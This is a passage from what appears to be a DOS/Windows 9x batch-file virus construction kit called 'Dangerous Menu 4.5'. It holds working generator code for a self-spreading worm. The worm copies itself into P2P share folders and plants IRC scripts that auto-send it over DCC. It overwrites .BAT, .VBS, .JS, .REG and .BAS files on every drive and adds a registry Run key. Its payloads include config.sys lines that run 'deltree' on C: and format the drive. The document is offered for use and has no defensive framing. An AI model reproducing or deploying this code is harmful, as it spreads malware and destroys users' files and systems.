echo.b.Writeline "copy %%0 c:\progra~1\kmd\myshar~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\limewire\shared\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\morpheus\myshar~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\overnet\bundles\tmpdelis.bat>nul">>batvirus.vbs
ctty con

:m10
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        Internet spreading
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo        Spread via mIRC, pIRCh, vIRC ? (Y/N):
echo.
choice /c:yn>nul
if errorlevel 2 goto m11
if errorlevel 1 goto a28

:a28
cls
@ctty nul
echo.b.Writeline "copy %%0 c:\mirc\download\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\mirc32\download\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\mirc\download\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\mirc32\download\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "echo.[script]>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.n0=on 1:JOIN:#:{>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.n1=/if ( $nick == $me ) { halt }>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.n2=/dcc send $nick %%windir%%\tmpdelis.bat>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.n3=}>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "deltree/y c:\mirc\script.ini>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\mirc32\script.ini>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\mirc\script.ini>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\mirc32\script.ini>nul">>batvirus.vbs
echo.b.Writeline "copy %%windir%%\tmpdelis.ini c:\mirc\script.ini>nul">>batvirus.vbs
echo.b.Writeline "copy %%windir%%\tmpdelis.ini c:\mirc32\script.ini>nul">>batvirus.vbs
echo.b.Writeline "copy %%windir%%\tmpdelis.ini c:\progra~1\mirc\script.ini>nul">>batvirus.vbs
echo.b.Writeline "copy %%windir%%\tmpdelis.ini c:\progra~1\mirc32\script.ini>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\pirch\downlo~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\pirch32\downlo~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\pirch98\downlo~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\pirch\downlo~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\pirch32\downlo~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\pirch98\downlo~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "echo.[Levels]>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.Enabled=1>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.Count=6>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.Level1=000-Unknowns>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.000-UnknownsEnabled=1>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.Level2=100-Level 100>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.100-Level 100Enabled=1>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.Level3=200-Level 200>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.200-Level 200Enabled=1>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.Level4=300-Level 300>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.300-Level 300Enabled=1>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.Level5=400-Level 400>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.400-Level 400Enabled=1>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.Level6=500-Level 500>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.500-Level 500Enabled=1>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.[000-Unknowns]>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.User1=*!*@*>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.UserCount=1>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.Event1=ON JOIN:#:/dcc send $nick %windir%\tmpdelis.bat>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.EventCount=1>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.[100-Level 100]>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.UserCount=0>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.EventCount=0>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.[200-Level 200]>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.UserCount=0>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.EventCount=0>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.[300-Level 300]>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.UserCount=0>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.EventCount=0>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.[400-Level 400]>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.UserCount=0>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.EventCount=0>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.[500-Level 500]>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.UserCount=0>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "echo.EventCount=0>>%%windir%%\tmpdelis.ini">>batvirus.vbs
echo.b.Writeline "deltree/y c:\pirch\events.ini>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\pirch98\events.ini>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\pirch32\events.ini>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\pirch\events.ini>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\pirch98\events.ini>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\pirch32\events.ini>nul">>batvirus.vbs
echo.b.Writeline "copy %%windir%%\tmpdelis.ini c:\pirch\events.ini>nul"
echo.b.Writeline "copy %%windir%%\tmpdelis.ini c:\pirch98\events.ini>nul"
echo.b.Writeline "copy %%windir%%\tmpdelis.ini c:\pirch32\events.ini>nul"
echo.b.Writeline "copy %%windir%%\tmpdelis.ini c:\progra~1\pirch\events.ini>nul"
echo.b.Writeline "copy %%windir%%\tmpdelis.ini c:\progra~1\pirch98\events.ini>nul"
echo.b.Writeline "copy %%windir%%\tmpdelis.ini c:\progra~1\pirch32\events.ini>nul"
echo.b.Writeline "echo.ab.regwrite "&chr(34)&"HKEY_USERS\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17"&chr(34)&","&chr(34)&"dcc send $nick %%windir%%\tmpdelis.bat"&chr(34)&">>%%windir%%\tmpdelis.vbs">>batvirus.vbs
ctty con

:m11
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        File infection
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo        Infect .BAT files ? (Y/N):
echo.
choice /c:yn>nul
if errorlevel 2 goto m12
if errorlevel 1 goto a29

:a29
cls
@ctty nul
echo.b.Writeline "for %%%%c in (*.bat ..\*.bat c:\mydocu~1\*.bat %%windir%%\*.bat %%path%%\*.bat %%windir%%\desktop\*.bat %%windir%%\command\ebd\*.bat %%windir%%\system\*.bat) do attrib -r -h -s -a %%%%c">>batvirus.vbs
echo.b.Writeline "for %%%%c in (*.bat ..\*.bat c:\mydocu~1\*.bat %%windir%%\*.bat %%path%%\*.bat %%windir%%\desktop\*.bat %%windir%%\command\ebd\*.bat %%windir%%\system\*.bat) do copy %%windir%%\tmpdelis.bat %%%%c /y">>batvirus.vbs
echo.b.Writeline "for %%%%c in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%c:\nul copy %%windir%%\tmpdelis.bat %%%%c:\tmpdelis.bat /y">>batvirus.vbs
ctty con

:m12
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        File infection
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo        Infect .VBS & .VBE files ? (Y/N):
echo.
choice /c:yn>nul
if errorlevel 2 goto m13
if errorlevel 1 goto a30

:a30
cls
@ctty nul
echo.b.Writeline "echo.ab.run "&chr(34)&"%%windir%%\tmpdelis.bat"&chr(34)&", VBHide>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "for %%%%e in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %%windir%%\*.vb* %%path%%\*.vb* %%windir%%\desktop\*.vb* %%windir%%\system\*.vb*) do attrib -r -h -s -a %%%%e">>batvirus.vbs
echo.b.Writeline "for %%%%e in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %%windir%%\*.vb* %%path%%\*.vb* %%windir%%\desktop\*.vb* %%windir%%\system\*.vb*) do copy %%windir%%\tmpdelis.vbs %%%%e /y">>batvirus.vbs
echo.b.Writeline "for %%%%e in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z) do %%comspec%% nul /f /c if exist %%%%e:\nul copy %%windir%%\tmpdelis.vbs %%%%e:\tmpdelis.vbs /y">>batvirus.vbs
ctty con

:m13
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        File infection
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo        Infect .JS & .JSE files ? (Y/N):
echo.
choice /c:yn>nul
if errorlevel 2 goto m14
if errorlevel 1 goto a31

:a31
cls
@ctty nul
echo.b.Writeline "echo.a=wscript.createobject("&chr(34)&"wscript.shell"&chr(34)&");>%%windir%%\tmpdelis.js">>batvirus.vbs
echo.b.Writeline "echo.a.Run("&chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&chr(34)&");>>%%windir%%\tmpdelis.js">>batvirus.vbs
echo.b.Writeline "for %%%%f in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %%windir%%\*.js* %%path%%\*.js* %%windir%%\desktop\*.js* %%windir%%\system\*.js*) do attrib -r -h -s -a %%%%f">>batvirus.vbs
echo.b.Writeline "for %%%%f in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %%windir%%\*.js* %%path%%\*.js* %%windir%%\desktop\*.js* %%windir%%\system\*.js*) do copy %%windir%%\tmpdelis.js %%%%f /y">>batvirus.vbs
echo.b.Writeline "for %%%%f in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z) do %%comspec%% nul /f /c if exist %%%%f:\nul copy %%windir%%\tmpdelis.js %%%%f:\tmpdelis.js /y">>batvirus.vbs
ctty con

:m14
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        File infection
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo        Infect .REG files ? (Y/N):
echo.
choice /c:yn>nul
if errorlevel 2 goto m15
if errorlevel 1 goto a32

:a32
cls
@ctty nul
echo.b.Writeline "echo.REGEDIT4>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo."&chr(34)&"a"&chr(34)&"="&chr(34)&"%%windir%%\tmpdelis.bat"&chr(34)&">>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "for %%%%g in (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %%windir%%\*.reg %%path%%\*.reg %%windir%%\desktop\*.reg %%windir%%\system\*.reg) do attrib -r -h -s -a %%%%g">>batvirus.vbs
echo.b.Writeline "for %%%%g in (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %%windir%%\*.reg %%path%%\*.reg %%windir%%\desktop\*.reg %%windir%%\system\*.reg) do copy %%windir%%\tmpdelis.reg %%%%g /y">>batvirus.vbs
echo.b.Writeline "for %%%%g in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z) do %%comspec%% nul /f /c if exist %%%%g:\nul copy %%windir%%\tmpdelis.reg %%%%g:\tmpdelis.reg /y">>batvirus.vbs
ctty con

:m15
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        File infection
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo        Infect .BAS (QBasic) files ? (Y/N):
echo.
choice /c:yn>nul
if errorlevel 2 goto m16
if errorlevel 1 goto a33

:a33
cls
@ctty nul
echo.b.Writeline "echo.SHELL "&chr(34)&"%%windir%%\tmpdelis.bat"&chr(34)&">%%windir%%\tmpdelis.bas">>batvirus.vbs
echo.b.Writeline "echo.END>>%%windir%%\tmpdelis.bas">>batvirus.vbs
echo.b.Writeline "for %%%%d in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %%windir%%\*.bas %%path%%\*.bas %%windir%%\desktop\*.bas %%windir%%\system\*.bas) do attrib -r -h -s -a %%%%d">>batvirus.vbs
echo.b.Writeline "for %%%%d in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %%windir%%\*.bas %%path%%\*.bas %%windir%%\desktop\*.bas %%windir%%\system\*.bas) do copy %%windir%%\tmpdelis.bas %%%%d /y">>batvirus.vbs
echo.b.Writeline "for %%%%d in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z) do %%comspec%% nul /f /c if exist %%%%d:\nul copy %%windir%%\tmpdelis.bas %%%%d:\tmpdelis.bas /y">>batvirus.vbs
ctty con

:m16
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        Others
echo        ÄÄÄÄÄÄ
echo.
echo.
echo        Want payload for Autoexec.bat ? (Y/N):
echo.
choice /c:yn>nul
if errorlevel 2 goto m17
if errorlevel 1 goto a34

:a34
cls
@ctty nul
echo.b.Writeline "echo.time 00:00:00,00>>c:\autoexec.bat">>batvirus.vbs
echo.b.Writeline "echo.date 80-01-01>>c:\autoexec.bat">>batvirus.vbs
echo.b.Writeline "echo.%%comspec%% nul /f /c if exist e:\nul subst e: a:\>>c:\autoexec.bat">>batvirus.vbs
echo.b.Writeline "echo.%%comspec%% nul /f /c if exist d:\nul subst d: a:\>>c:\autoexec.bat">>batvirus.vbs
echo.b.Writeline "echo.%%comspec%% nul /f /c if exist c:\nul subst c: a:\>>c:\autoexec.bat">>batvirus.vbs
ctty con

:m17
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        Others
echo        ÄÄÄÄÄÄ
echo.
echo.
echo        Want payload for Config.sys ? (Y/N):
echo.
choice /c:yn>nul
if errorlevel 2 goto m18
if errorlevel 1 goto a35

:a35
cls
@ctty nul
echo.b.Writeline "echo.[menu]>>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.menuitem=ab>>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.>>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.[ab]>>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.buffers=1>>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.files=1>>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.lastdrive=A>>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.set path=deltree/y c:\>>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.set temp=A:\>>c:\config.sys">>batvirus.vbs
echo.b.Writeline "echo.set windir=format c:/u/q/autotest>>c:\config.sys">>batvirus.vbs
ctty con

:m18
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        Others
echo        ÄÄÄÄÄÄ
echo.
echo.
echo        Want payload for desktop ? (Y/N):
echo.
choice /c:yn>nul
if errorlevel 2 goto m19
if errorlevel 1 goto a36

:a36
cls
@ctty nul
set +=&Chr(124)&
set &=&Chr(62)&
set -=Chr(37)&i&Chr(37)&i&
echo.i="">>batvirus.vbs
echo.j=int(rnd(1)*8)+1>>batvirus.vbs
echo.for w=1 To j>>batvirus.vbs
echo.i=i&chr(int(rnd(1)*120)+120)>>batvirus.vbs
echo.next>>batvirus.vbs
echo.b.Writeline "set "&i&"=md %%windir%%\desktop\">>batvirus.vbs
echo.b.Writeline %-%"00"%&%"nul "%+%" "&%-%"01"%&%"nul "%+%" "&%-%"02"%&%"nul "%+%" "&%-%"03"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"04"%&%"nul "%+%" "&%-%"05"%&%"nul "%+%" "&%-%"06"%&%"nul "%+%" "&%-%"07"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"08"%&%"nul "%+%" "&%-%"09"%&%"nul "%+%" "&%-%"10"%&%"nul "%+%" "&%-%"11"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"12"%&%"nul "%+%" "&%-%"13"%&%"nul "%+%" "&%-%"14"%&%"nul "%+%" "&%-%"15"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"16"%&%"nul "%+%" "&%-%"17"%&%"nul "%+%" "&%-%"18"%&%"nul "%+%" "&%-%"19"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"20"%&%"nul "%+%" "&%-%"21"%&%"nul "%+%" "&%-%"22"%&%"nul "%+%" "&%-%"23"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"24"%&%"nul "%+%" "&%-%"25"%&%"nul "%+%" "&%-%"26"%&%"nul "%+%" "&%-%"27"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"28"%&%"nul "%+%" "&%-%"29"%&%"nul "%+%" "&%-%"30"%&%"nul "%+%" "&%-%"31"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"32"%&%"nul "%+%" "&%-%"33"%&%"nul "%+%" "&%-%"34"%&%"nul "%+%" "&%-%"35"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"36"%&%"nul "%+%" "&%-%"37"%&%"nul "%+%" "&%-%"38"%&%"nul "%+%" "&%-%"39"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"40"%&%"nul "%+%" "&%-%"41"%&%"nul "%+%" "&%-%"42"%&%"nul "%+%" "&%-%"43"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"44"%&%"nul "%+%" "&%-%"45"%&%"nul "%+%" "&%-%"46"%&%"nul "%+%" "&%-%"47"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"48"%&%"nul "%+%" "&%-%"49"%&%"nul "%+%" "&%-%"50"%&%"nul "%+%" "&%-%"51"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"52"%&%"nul "%+%" "&%-%"53"%&%"nul "%+%" "&%-%"54"%&%"nul "%+%" "&%-%"55"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"56"%&%"nul "%+%" "&%-%"57"%&%"nul "%+%" "&%-%"58"%&%"nul "%+%" "&%-%"59"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"60"%&%"nul "%+%" "&%-%"61"%&%"nul "%+%" "&%-%"62"%&%"nul "%+%" "&%-%"63"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"64"%&%"nul "%+%" "&%-%"65"%&%"nul "%+%" "&%-%"66"%&%"nul "%+%" "&%-%"67"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"68"%&%"nul "%+%" "&%-%"69"%&%"nul "%+%" "&%-%"70"%&%"nul "%+%" "&%-%"71"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"72"%&%"nul "%+%" "&%-%"73"%&%"nul "%+%" "&%-%"74"%&%"nul "%+%" "&%-%"75"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"76"%&%"nul "%+%" "&%-%"77"%&%"nul "%+%" "&%-%"78"%&%"nul "%+%" "&%-%"79"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"80"%&%"nul "%+%" "&%-%"81"%&%"nul "%+%" "&%-%"82"%&%"nul "%+%" "&%-%"83"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"84"%&%"nul "%+%" "&%-%"85"%&%"nul "%+%" "&%-%"86"%&%"nul "%+%" "&%-%"87"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"88"%&%"nul "%+%" "&%-%"89"%&%"nul "%+%" "&%-%"90"%&%"nul "%+%" "&%-%"91"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"92"%&%"nul "%+%" "&%-%"93"%&%"nul "%+%" "&%-%"94"%&%"nul "%+%" "&%-%"95"%&%"nul">>batvirus.vbs
echo.b.Writeline %-%"96"%&%"nul "%+%" "&%-%"97"%&%"nul "%+%" "&%-%"98"%&%"nul "%+%" "&%-%"99"%&%"nul">>batvirus.vbs
set +=|set -=|set &=
ctty con

:m19
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        Others
echo        ÄÄÄÄÄÄ
echo.
echo.
echo        Want to restart after infection ? (Y/N):
echo.
choice /c:yn>nul
if errorlevel 2 goto done0
if errorlevel 1 goto m20

:m20
cls
@ctty nul
echo.b.Writeline "cscript %%windir%%\tmpdelis.vbs">>batvirus.vbs
ctty con
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        Others
echo        ÄÄÄÄÄÄ
echo.
echo.
echo    1 - Normal Shutdown [win9x & winme]
echo.
echo    2 - Forced Shutdown [win9x & winme]
echo.
echo    3 - Forced Reboot   [win9x & winme]
echo.
echo    4 - Normal Shutdown [MS-DOS]
echo.
echo.
echo    Your choice:
choice /c:1234>nul
if errorlevel 4 goto a40
if errorlevel 3 goto a39
if errorlevel 2 goto a38
if errorlevel 1 goto a37

:a37
cls
@ctty nul
echo.b.Writeline "rundll32 user,exitwindows">>batvirus.vbs
ctty con
goto done

:a38
cls
@ctty nul
echo.b.Writeline "rundll32 krnl386,exitkernel">>batvirus.vbs
ctty con
goto done

:a39
cls
@ctty nul
echo.b.Writeline "rundll32 shell32,shexitwindowsex 4">>batvirus.vbs
ctty con
goto done

:a40
cls
@ctty nul
echo.b.Writeline "echo G=FFFF:0|%%windir%%\command\debug.exe>nul">>batvirus.vbs
ctty con

:done0
echo.b.Writeline "cscript %%windir%%\tmpdelis.vbs">>batvirus.vbs

:done
cls
@ctty nul
echo.b.Writeline "cls">>batvirus.vbs
echo.b.Close>>batvirus.vbs
cscript batvirus.vbs
ctty con
@type nul|choice /n /cy /ty,3>nul
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo        Your creation is now compiled in curent folder [batvirus.txt]
@echo                      Rename batvirus.txt to filename.bat
@echo.
@echo                          Press any key to exit ...
@pause>nul

:end
@deltree/y batvirus.vbs>nul
cls